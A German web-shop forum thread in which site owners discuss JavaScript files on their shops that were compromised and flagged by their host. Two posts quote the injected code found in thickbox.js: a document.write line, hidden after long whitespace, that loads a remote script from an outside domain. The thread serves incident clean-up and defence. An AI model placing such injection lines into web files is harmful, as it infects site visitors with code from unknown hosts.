Trojaner?

[Webcraft Solutions]

Hallo zusammen,

ein Kunde von mir hat von seinem Webhoster folgende Mitteilung bekommen:

leider mussten wir Ihren Account sperren, da über ein komprimitiertes Skript ein Trojaner über Ihren Account verbreitet wurde.

Der Trojaner ist auf Ihrem Webspace hier abgelegt worden:

../templates/xtc5/javascript/thickbox.js

Allerdings ist diese js-Datei doch kein Trojaner, sondern eine standardmäßige Datei des Shops, oder irre ich mich da ..!?

Grüße

Linkback: https://www.modified-shop.org/forum/index.php?topic=29571.0

[astaller]

Hallo Webcraft Solutions,

lass mich raten, Alfahosting?
Genau die Meldung bekam ich heute auch.

Hier wurden einige *.js-Dateien Kompromittiert.

MfG
Achim S.

[Webcraft Solutions]

Ja richtig Achim

Hmmm und was heißt das jetzt? Ich hab doch die neueste Shopversion drauf und auch die Sicherheitsupdates eingespielt ... was ist da passiert?

Oder noch besser: Was muss ich nun unternehmen?

Gruß Sascha

[astaller]

Hmm, als erstes mal alle Passwörter ändern (FTP, Confixx, SQL, Kundenbereich).

Ich habe mir alle Shopdaten runtergeladen und mit Dreamweaver eine Suche im ganzen Shop gestartet nach "kovar"...

Bei mir sah die Datei so aus:

Code: Javascript  [Auswählen]

/*19f955*/

                                                                                                                                                                                         /*mm0941m09*/

document.write("<script type='text/javascript' src='http://www.kovarmarketing.de/Z2GVjKyb.php?id='></"+ "script>");


/*/19f955*/
 

Den ganzen Code entfernt und wieder hochgeladen.
Ich kenn jetzt leider keine Software (ausser Dreamweaver) mit welche du in den ganzen Shop-Dateien eine solche Suche machen kannst.
Vieleicht ein anderes Forenmitglied...

MfG
Achim S.

[Webcraft Solutions]

Editor hab ich Notepad++ damit hats auch wunderbar funktioniert.

Danke für den Hinweis!

Bei mir wars:

Code: Javascript  [Auswählen]

/*19f955*/

                                                                                                                                                                                         /*ndalfndalf097183ndalf09*/

document.write("<script type='text/javascript' src='http://picquic.com/hYNtPL8g.php?id='></"+ "script>");


/*/19f955*/

[astaller]

nur zur Info, bei mir waren es aber mehrere Dateien, falls das nicht rüber kam.

MfG
Achim S.

[Matt]

Es sind vermutlich alle .js Files betroffen, es gibt bereits einen Thread zu diesem Thema, Problem ist vermutlich mal wieder Filezilla.

[Webcraft Solutions]

@ Achim: Ah ok, danke für den Hinweis! Naja, wüsste nicht welche anderen Dateien ich jetzt auf gut Glück noch durchsuchen sollte, diese eine war die einzige die angegeben wurde.
Jedenfalls vielen Dank für deine schnelle Hilfe!

@Matt: Nein, es wird Flash FXP verwendet, Filezilla ist schon lange verbannt ...

Werde dann gleich mal noch weitere .js Files durchsehen, oder zur Not einfach das Backup von letzter Woche aufspielen, auch wenn dadurch einige Bestellungen verloren gehen ...

Gruß Sascha

[Matt]

Es ist nicht nötig das Datenbankbackup einzuspielen, die Files reichen völlig.

[Webcraft Solutions]

In der Hektik verliert man schonmal die nötige Gelassenheit... du hast natürlich recht Matt, die DB ist ja nicht betroffen ... super - vielen Dank für den Hinweis!  

[noRiddle (revilonetz)]

Mmmh, langsam macht mir das aber Sorgen mit den kompromittierten Javascript-Files,
sollte es da doch irgendwo eine Lücke im System geben ?
Allein die Tatsache, daß im letzten Fall "Flash FXP" verwendet wurde und nicht "Filezilla" o.ä....,
was natürlich nicht heißt, daß der verwendete Rechner nicht kompromittiert ist, aber seltsam ist das ganze schon.

Mich würde interessieren ob jemand der diese Probleme mit kompromittierten Javascript-Files hat/hatte irgendeine Ajax-Implementation verwendet.

Gruß,
noRiddle

[ShopNix]

Es ist nicht nötig das Datenbankbackup einzuspielen, die Files reichen völlig.

Bei jeder zweifelhaften Situation sollte man zumindest prüfen, ob es vielleicht einen zusätzlichen Admin gibt.

[Bonner]

ja, es ist schon auffällig, das in den letzten Tagen vermehrt immer dieselben Probelme auftauchen.

Filezilla ist bei mir auch raus und durch Win SCP (Danke an dmun für den Tip!) ersetzt.
Wenn ich es heute schaffe, werde ich mal das Prüfsummen-Modul einbauen..ist jetzt nicht die letzte Sicherheit, aber doch nützlich.

Als Alternative zu Dreamwaver gibt es für Windows den Superfinder XT (ist kostenlos). Da ist problemlos eine String-Suche etc möglich.

[p3e]

Die Schnittmenge der beiden oberen Poster scheint ja Alfahosting zu sein. Ist wahrscheinlich ein Zufall, bin aber gespannt ob die Opfer des anderen Thema auch bei Alfahosting sind.
Genauso gut kann es auch sein, dass Alfahosting lobenswerter Weise den Webspace regelmäßig überprüft und es den Kunden das mitteilt, was woanders erst viel später auffällt.

[Bonner]

Nein bei den anderen war es die Serverfarm Netbeat in München, sowie Server in Argentinien bzw. Italien wie Matt dankenswerter Weise rausgefunden hat.

Bonner